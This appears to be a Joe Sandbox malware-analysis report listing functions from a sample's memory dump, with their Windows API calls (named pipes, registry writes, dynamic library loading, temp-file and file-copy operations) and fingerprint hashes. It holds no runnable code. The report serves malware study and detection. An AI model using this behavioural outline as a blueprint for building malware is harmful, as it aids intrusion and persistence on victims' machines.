Part of subcall function 00760EDC: lstrlen.KERNEL32(00753A9F,00000000,?,?,?,?,00753A9F,00000035,00000000,?,00000000), ref: 00760F0C
Part of subcall function 00760EDC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00760F22
Part of subcall function 00760EDC: memcpy.NTDLL(00000010,00753A9F,00000000,?,?,00753A9F,00000035,00000000), ref: 00760F58
Part of subcall function 00760EDC: memcpy.NTDLL(00000010,00000000,00000035,?,?,00753A9F,00000035), ref: 00760F73
Part of subcall function 00760EDC: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 00760F91
Part of subcall function 00760EDC: GetLastError.KERNEL32(?,?,00753A9F,00000035), ref: 00760F9B
Part of subcall function 00760EDC: HeapFree.KERNEL32(00000000,00000000,?,?,00753A9F,00000035), ref: 00760FBE

HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 00763762
HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000000,00000000,?,?), ref: 00763772

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
String ID:
API String ID: 3733591251-0
Opcode ID: e0e20488a103baad037c275af91c4e9a99c5cf1b1268187c69566a70d492af7f
Instruction ID: 50404c87a18d3002be2479319b3047869b8a1c5f08c65db04ed2f2e427f66114
Opcode Fuzzy Hash: e0e20488a103baad037c275af91c4e9a99c5cf1b1268187c69566a70d492af7f
Instruction Fuzzy Hash: 398160B1900119FFDF109FA4DC88DAEBBB9FB04384B008469F90AA3221D7395F95DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0075BFC4 Relevance: 21.2, APIs: 14, Instructions: 206memorystringthreadCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C), ref: 0075C013
StrTrimA.SHLWAPI(00000001,?), ref: 0075C02C
StrChrA.SHLWAPI(?,0000002C), ref: 0075C037
StrTrimA.SHLWAPI(00000001,?), ref: 0075C050
lstrlen.KERNEL32(?,?,00000001,?,?), ref: 0075C0F3
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0075C115
lstrcpy.KERNEL32(00000020,?), ref: 0075C134
lstrlen.KERNEL32(?), ref: 0075C13E
memcpy.NTDLL(?,?,?), ref: 0075C17F
memcpy.NTDLL(?,?,?), ref: 0075C192
SwitchToThread.KERNEL32(?,00000000,?,?), ref: 0075C1B6
HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 0075C1D8
HeapFree.KERNEL32(00000000,?,?,00000001,?,?), ref: 0075C1FE
HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?), ref: 0075C21A

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
String ID:
API String ID: 3323474148-0
Opcode ID: e04c2479d0b7b7c797b02cc4736b1d07a63366d8411b9e6bc555c65adbe322fd
Instruction ID: 612ea3be7bcb6e10951accd19ea9e431ba925c4a50510fd0bd568444a183a4eb
Opcode Fuzzy Hash: e04c2479d0b7b7c797b02cc4736b1d07a63366d8411b9e6bc555c65adbe322fd
Instruction Fuzzy Hash: 6E718971104305EFD722DF24DC44B9ABBE8FB48345F04492EF989D2261D778DA49CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0076C75F Relevance: 21.1, APIs: 14, Instructions: 141synchronizationpipethreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0076C791
WaitForSingleObject.KERNEL32(0000053C,00000000), ref: 0076C7B3
ConnectNamedPipe.KERNEL32(?,?), ref: 0076C7D3
GetLastError.KERNEL32 ref: 0076C7DD
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0076C801
FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 0076C844
DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 0076C84D
WaitForSingleObject.KERNEL32(00000000), ref: 0076C856
CloseHandle.KERNEL32(?), ref: 0076C86B
GetLastError.KERNEL32 ref: 0076C878
CloseHandle.KERNEL32(?), ref: 0076C885
RtlExitUserThread.NTDLL(000000FF), ref: 0076C89B
GetLastError.KERNEL32 ref: 0076C8DC
SetLastError.KERNEL32(000000E8), ref: 0076C8EE

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorLast$Wait$CloseHandleNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
String ID:
API String ID: 1813321465-0
Opcode ID: d5970a19a55186a59c89abf4668b60975367f65a5df01dbd1a6f14b7d80e1770
Instruction ID: f59596d2e180e9462a2313749698c26ba989871f3a40132d9c1cbbe6cecc8c5c
Opcode Fuzzy Hash: d5970a19a55186a59c89abf4668b60975367f65a5df01dbd1a6f14b7d80e1770
Instruction Fuzzy Hash: E741B471504309FFD7119F68CC489AE7BA9FB44354F008A29F96AD31A0D7789E84CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00767CC5 Relevance: 21.1, APIs: 14, Instructions: 109libraryloaderstringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,?,007515C8,?,?), ref: 00767CD2

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,007515C8,?,?), ref: 00767CFB
lstrcpyW.KERNEL32(-0000FFFE,?), ref: 00767D1B
lstrcpyW.KERNEL32(-00000002,?), ref: 00767D37
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,007515C8,?,?), ref: 00767D43
LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,007515C8,?,?), ref: 00767D46
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,007515C8,?,?), ref: 00767D52
GetProcAddress.KERNEL32(00000000,?), ref: 00767D6F
GetProcAddress.KERNEL32(00000000,?), ref: 00767D89
GetProcAddress.KERNEL32(00000000,?), ref: 00767D9F
GetProcAddress.KERNEL32(00000000,?), ref: 00767DB5
GetProcAddress.KERNEL32(00000000,?), ref: 00767DCB
GetProcAddress.KERNEL32(00000000,?), ref: 00767DE1
FreeLibrary.KERNEL32(00000000,?,?,?,?,007515C8,?,?), ref: 00767E0A

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
String ID:
API String ID: 3772355505-0
Opcode ID: cf1acba2683961672af67be2adef2cf7e6e0121066f310d4f716a4f1c40cb6c5
Instruction ID: dac456bf40db01acdc8ff3db79597c4e0783135ef7ed57d6ade36839c34d3512
Opcode Fuzzy Hash: cf1acba2683961672af67be2adef2cf7e6e0121066f310d4f716a4f1c40cb6c5
Instruction Fuzzy Hash: 39316B7150420BEFE7119F64DC88D6A7BECEF04394B04856AE809C7261EB3DED54CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0075F52B Relevance: 21.1, APIs: 14, Instructions: 82stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,?,?,?,007546EB,?,?,?), ref: 0075F542
lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,007546EB,?,?,?), ref: 0075F54D
lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,007546EB,?,?,?), ref: 0075F555
RtlAllocateHeap.NTDLL(00000000,?), ref: 0075F56A
lstrcpyW.KERNEL32(00000000,?), ref: 0075F57B
lstrcatW.KERNEL32(00000000,?), ref: 0075F58D
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,007546EB,?,?,?), ref: 0075F592
lstrcatW.KERNEL32(00000000,007733F0), ref: 0075F59E
lstrcatW.KERNEL32(00000000), ref: 0075F5A7
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,007546EB,?,?,?), ref: 0075F5AC
lstrcatW.KERNEL32(00000000,007733F0), ref: 0075F5B8
lstrcatW.KERNEL32(00000000,00000002), ref: 0075F5D4
CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,007546EB,?,?,?), ref: 0075F5DC
HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,007546EB,?,?,?), ref: 0075F5EA

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
String ID:
API String ID: 3635185113-0
Opcode ID: 5a2a5ba133bef5e0c4687c9c065f0a98b99644975ca1d2168b6b5522049ffc8b
Instruction ID: 6f317162f7e7dd16716679088fa4736627d4efee28f85aeda2faab0bed18ccfd
Opcode Fuzzy Hash: 5a2a5ba133bef5e0c4687c9c065f0a98b99644975ca1d2168b6b5522049ffc8b
Instruction Fuzzy Hash: 3821D432140319BFD7225F24DC44E7FBBADEF85B81F10402AF94982160DF689D55EA69

Uniqueness

Uniqueness Score: -1.00%

Function 0076ACFD Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 143stringsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0076AD2C
memcpy.NTDLL(?,?,00000010), ref: 0076AD4F
memset.NTDLL ref: 0076AD9B
lstrcpyn.KERNEL32(?,?,00000034), ref: 0076ADAF
GetLastError.KERNEL32 ref: 0076ADDD

Strings

*&w, xrefs: 0076AD76
&w, xrefs: 0076AD5D

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorLastObjectSingleWaitlstrcpynmemcpymemset
String ID: &w$*&w
API String ID: 3790987218-3756237042
Opcode ID: 9a8c8e66ff01e628dda0bd2a90d7615038afd72a0437ac0e33e37df506682b21
Instruction ID: e2f2020df0c4ea2e54dca2c3438855d75b87d3b7709a3780d6af90d42dc22ef4
Opcode Fuzzy Hash: 9a8c8e66ff01e628dda0bd2a90d7615038afd72a0437ac0e33e37df506682b21
Instruction Fuzzy Hash: 93518B71904700BFD3219F24CC09A6BB7E9FF84751F008A2EF99AA2190E7B9D944CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00752D57 Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 298COMMON

Download Yara Rule

Strings

%"w, xrefs: 00752D92
Tpw, xrefs: 00752DBA
$w, xrefs: 00752DF5, 00753003

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: $w$%"w$Tpw
API String ID: 1279760036-533210567
Opcode ID: a0f4e851c108427ab209196c0152ed5b16d74ea5018beaed9603def3c57aed83
Instruction ID: 850d1f6672dba3aa5a694530fd494b905ebf8673ece94018bc9eff0fc02f032d
Opcode Fuzzy Hash: a0f4e851c108427ab209196c0152ed5b16d74ea5018beaed9603def3c57aed83
Instruction Fuzzy Hash: CAB14571D00219EFDF21DB94CC49AEEBBB9EF06356F108065E814B7261C7789E4ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 0075A7D9 Relevance: 18.2, APIs: 12, Instructions: 195memorystringthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0075F2AE: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 0075F2F3
Part of subcall function 0075F2AE: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0075F30B
Part of subcall function 0075F2AE: WaitForSingleObject.KERNEL32(00000000,?,00000000,?,007633D4,0075D497,00000000,00000001,00756FCB,00000000), ref: 0075F3D3
Part of subcall function 0075F2AE: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,007633D4,0075D497,00000000,00000001,00756FCB,00000000), ref: 0075F3FC
Part of subcall function 0075F2AE: HeapFree.KERNEL32(00000000,0075D497,?,00000000,?,007633D4,0075D497,00000000,00000001,00756FCB,00000000), ref: 0075F40C
Part of subcall function 0075F2AE: RegCloseKey.ADVAPI32(007633D4,?,00000000,?,007633D4,0075D497,00000000,00000001,00756FCB,00000000), ref: 0075F415

lstrcmp.KERNEL32(?,?), ref: 0075A850
HeapFree.KERNEL32(00000000,?,?,?,7476F750), ref: 0075A87C
GetCurrentThreadId.KERNEL32 ref: 0075A92D
GetCurrentThread.KERNEL32 ref: 0075A93E
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,007674BB,?,00000001,?,?,7476F750), ref: 0075A97A
HeapFree.KERNEL32(00000000,?,?,00000000,?,007674BB,?,00000001,?,?,7476F750), ref: 0075A98E
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0075A99C
wsprintfA.USER32 ref: 0075A9B4

Part of subcall function 00758922: lstrlen.KERNEL32(?,?,?,00000008,00753B81), ref: 0075892C
Part of subcall function 00758922: lstrcpy.KERNEL32(00000000,?), ref: 00758950
Part of subcall function 00758922: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,00000008,00753B81), ref: 00758957
Part of subcall function 00758922: lstrcat.KERNEL32(00000000,?), ref: 007589AE

lstrlen.KERNEL32(00000000,00000000), ref: 0075A9BF
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0075A9D6
HeapFree.KERNEL32(00000000,00000000), ref: 0075A9E7
HeapFree.KERNEL32(00000000,?), ref: 0075A9F3

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
String ID:
API String ID: 773763258-0
Opcode ID: 585e7baa144c70ba89ac04ecf838a7dac5f7137abec89a8567f1a4c0cf472833
Instruction ID: 7a2c549dd84a8a106c875696576b759d3d3fd641983d1d6b0abd4330761e4977
Opcode Fuzzy Hash: 585e7baa144c70ba89ac04ecf838a7dac5f7137abec89a8567f1a4c0cf472833
Instruction Fuzzy Hash: 28713871900119FFDB11DFA4DC88DEEBBB9FF08351F008129E909A7220D778AA89DB55

Uniqueness

Uniqueness Score: -1.00%

Function 0076B1C9 Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,74715520,?,00000000,?,?,?), ref: 0076B1DF
lstrlen.KERNEL32(?), ref: 0076B1E7
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0076B1F7
lstrcpy.KERNEL32(00000000,?), ref: 0076B216
lstrlen.KERNEL32(?), ref: 0076B22B
lstrlen.KERNEL32(?), ref: 0076B239
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 0076B287
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0076B2AB
lstrlen.KERNEL32(?), ref: 0076B2DE
HeapFree.KERNEL32(00000000,?,?), ref: 0076B309
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0076B320
HeapFree.KERNEL32(00000000,?,?), ref: 0076B32D

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$Free$Allocatelstrcpy
String ID:
API String ID: 904523553-0
Opcode ID: 67ecfafeb4c065f9acd7c1b16d9b28448202f02556e87201145b500478da6ee1
Instruction ID: ac805c9ae335358f1f36e8bfd33cc57afb8f9f93a429731a4cb9240c3adf69de
Opcode Fuzzy Hash: 67ecfafeb4c065f9acd7c1b16d9b28448202f02556e87201145b500478da6ee1
Instruction Fuzzy Hash: 97417B32900209AFDF129FA5CC44AAE7BBAFB46350F108025F91697260DB39EA95DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00770A73 Relevance: 18.1, APIs: 12, Instructions: 95registrymemorystringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000094), ref: 00770A84
GetTempPathA.KERNEL32(00000000,00000000,?,?,0076A64A,00000000,00000094), ref: 00770A9C
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 00770AAB
GetTempPathA.KERNEL32(00000001,00000000,?,?,0076A64A,00000000,00000094), ref: 00770ABE
GetTickCount.KERNEL32 ref: 00770AC2
wsprintfA.USER32 ref: 00770AD9
RegCreateKeyA.ADVAPI32(80000001,?,00000094), ref: 00770B14
StrRChrA.SHLWAPI(00000000,00000000,?), ref: 00770B34
lstrlen.KERNEL32(00000000), ref: 00770B3E
RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 00770B4E
RegCloseKey.ADVAPI32(?), ref: 00770B5A
HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,00000000,00000001,00000000,00000094), ref: 00770B68

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
String ID:
API String ID: 3778301466-0
Opcode ID: 0540b4948572135917b4cd89309dea5285fbe86ea213f44302f9250b5d087177
Instruction ID: b45dd007469673290b53a01e7d19670dc32d4b912677c6efb435a640e4b4a4c0
Opcode Fuzzy Hash: 0540b4948572135917b4cd89309dea5285fbe86ea213f44302f9250b5d087177
Instruction Fuzzy Hash: D53148B5501118FFDB119FA5DC8CDAB7BADEF053D9B008066F909C6220DB388E91DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0076F262 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 124threadstringCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0076F2A3
GetWindowThreadProcessId.USER32(00000000,?), ref: 0076F2D1
GetWindowThreadProcessId.USER32(?,?), ref: 0076F316
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0076F33E
_strupr.NTDLL ref: 0076F369
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0076F376
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0076F390

Strings

2(w, xrefs: 0076F2D7
((w, xrefs: 0076F3CA
<(w, xrefs: 0076F2EF

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
String ID: ((w$2(w$<(w
API String ID: 3831658075-3963633597
Opcode ID: a3073b858c57a77901f3417fb5ebefff097ccb26fe37d3c85d1c44124b6c95d2
Instruction ID: 4f133430f87dc3e97ee97d3c0314f4253c318cf6a50038b7675fad5add680f82
Opcode Fuzzy Hash: a3073b858c57a77901f3417fb5ebefff097ccb26fe37d3c85d1c44124b6c95d2
Instruction Fuzzy Hash: 90411C71D00218FFDF219FA5DC49BEEBBB9BF08741F148466E905A2250D7789A80DF94

Uniqueness

Uniqueness Score: -1.00%

Function 0075BC0B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 119memorythreadstringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 0075BC35
GetCurrentThreadId.KERNEL32 ref: 0075BC4B
GetCurrentThread.KERNEL32 ref: 0075BC5C

Part of subcall function 0076E52A: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E53C
Part of subcall function 0076E52A: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E555
Part of subcall function 0076E52A: GetCurrentThreadId.KERNEL32 ref: 0076E562
Part of subcall function 0076E52A: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E56E
Part of subcall function 0076E52A: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E57C
Part of subcall function 0076E52A: lstrcpy.KERNEL32(00000000), ref: 0076E59E

Part of subcall function 00753B65: lstrlen.KERNEL32(?,00000001,?,?,?,00000001), ref: 00753BD0
Part of subcall function 00753B65: HeapFree.KERNEL32(00000000,00000000,?,?,?,00000001), ref: 00753BF8

HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,?,?), ref: 0075BCD5
HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,?,?), ref: 0075BCE1
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0075BD30
wsprintfA.USER32 ref: 0075BD48
lstrlen.KERNEL32(00000000,00000000), ref: 0075BD53
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0075BD6A

Strings

W, xrefs: 0075BD1D

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
String ID: W
API String ID: 630447368-655174618
Opcode ID: a8a473ac42c02e7fe009adac89ae0f714b3cbcae44c19cb389bb7e6f1ee7a64d
Instruction ID: fb3f55d95b30b385a0d11d4877d41c62e37cee8bdd52b1d6fbb3ffda9df17d51
Opcode Fuzzy Hash: a8a473ac42c02e7fe009adac89ae0f714b3cbcae44c19cb389bb7e6f1ee7a64d
Instruction Fuzzy Hash: AE413971900219EFDF119FA0DC48DFEBBB9FB44781B108026F90992220DB799A94DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0075F6B3 Relevance: 16.7, APIs: 11, Instructions: 157registrystringfileCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 0075F6DE

Part of subcall function 007603AF: RegCloseKey.ADVAPI32(?,?,0075F6FE,00000000,00000000,?), ref: 00760436

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 0075F719
lstrcpyW.KERNEL32(-00000002,?), ref: 0075F77B
lstrcatW.KERNEL32(00000000,?), ref: 0075F790
lstrcpyW.KERNEL32(?), ref: 0075F7AA
lstrcatW.KERNEL32(00000000,?), ref: 0075F7B9

Part of subcall function 007529AD: lstrlenW.KERNEL32(?), ref: 007529C0
Part of subcall function 007529AD: lstrlen.KERNEL32(?), ref: 007529CB
Part of subcall function 007529AD: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 007529E0

RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 0075F823

Part of subcall function 0075D13A: lstrlenW.KERNEL32(80000001,76B306E0,007721F3,80000001,?,?,007514FC,?), ref: 0075D146
Part of subcall function 0075D13A: memcpy.NTDLL(00000000,00000002,00000000,00000002,?,?,007514FC,?), ref: 0075D16E
Part of subcall function 0075D13A: memset.NTDLL ref: 0075D180

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 0075F858
GetLastError.KERNEL32 ref: 0075F863
HeapFree.KERNEL32(00000000,00000000), ref: 0075F879
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 0075F88B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
String ID:
API String ID: 1430934453-0
Opcode ID: aac30ce3b1a6bc985e77cc77406f7aecca2f38afd05b9b56778705a3228c2d95
Instruction ID: 4e081ba7dad6d8fecf83a2a86027ec6ea8ffc6fa080b570c7d326aa58fbc7922
Opcode Fuzzy Hash: aac30ce3b1a6bc985e77cc77406f7aecca2f38afd05b9b56778705a3228c2d95
Instruction Fuzzy Hash: 88518D31900109EFDB11DBA4DC88EEE77B9FF08385B108069F909A7120DB79EE45DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0075A471 Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0075A4A7
RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0075A4BC
RegCreateKeyA.ADVAPI32(80000001,?), ref: 0075A4E4
HeapFree.KERNEL32(00000000,?), ref: 0075A525
HeapFree.KERNEL32(00000000,00000000), ref: 0075A535
RtlAllocateHeap.NTDLL(00000000,0076B270), ref: 0075A548
RtlAllocateHeap.NTDLL(00000000,0076B270), ref: 0075A557
HeapFree.KERNEL32(00000000,00000000,?,0076B270,00000000,?,?,?), ref: 0075A5A1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0076B270,00000000,?,?,?,?), ref: 0075A5C5
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0076B270,00000000,?,?,?), ref: 0075A5EA
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0076B270,00000000,?,?,?), ref: 0075A5FF

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Free$Allocate$CloseCreate
String ID:
API String ID: 4126010716-0
Opcode ID: 139e5095f87ffdc1fb3391269c415c09f09b7c3acfe640d459dfffa94a618e72
Instruction ID: 6a9b44fe88e035468f9d1b27f2e0a6dbe4225f65691d03cd4a7b8e3380e2f90b
Opcode Fuzzy Hash: 139e5095f87ffdc1fb3391269c415c09f09b7c3acfe640d459dfffa94a618e72
Instruction Fuzzy Hash: 8651D7B1D00109FFDF019FA4DC848EEBBB9FB08341F10846AE919A2120D7798E98DF65

Uniqueness

Uniqueness Score: -1.00%

Function 00771008 Relevance: 16.6, APIs: 11, Instructions: 121memorystringCOMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI(?), ref: 00771022
PathFindFileNameW.SHLWAPI(?), ref: 00771038
lstrlenW.KERNEL32(00000000), ref: 0077107B
RtlAllocateHeap.NTDLL(00000000,007721F5), ref: 00771091
memcpy.NTDLL(00000000,00000000,007721F3), ref: 007710A4
_wcsupr.NTDLL ref: 007710B0
lstrlenW.KERNEL32(?,007721F3), ref: 007710E9
RtlAllocateHeap.NTDLL(00000000,?,007721F3), ref: 007710FE
lstrcpyW.KERNEL32(00000000,?), ref: 00771114
lstrcatW.KERNEL32(00000000,?), ref: 0077113A
HeapFree.KERNEL32(00000000,00000000), ref: 00771149

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
String ID:
API String ID: 3868788785-0
Opcode ID: 80133cb32ff1de600c127623df30c5971f2cba46ee04b39cd8da923b560c6592
Instruction ID: 89b355e6afa1ac364f87077440255cec597d3130cc8549c46ce1b08e48d751bd
Opcode Fuzzy Hash: 80133cb32ff1de600c127623df30c5971f2cba46ee04b39cd8da923b560c6592
Instruction Fuzzy Hash: 5E310732200218ABCB205F78DC88D6B77A9EB497D0B94C52AFA5CD6160DF7CDD84CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00757BFF Relevance: 16.6, APIs: 11, Instructions: 103registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00757C27

Part of subcall function 007603AF: RegCloseKey.ADVAPI32(?,?,0075F6FE,00000000,00000000,?), ref: 00760436

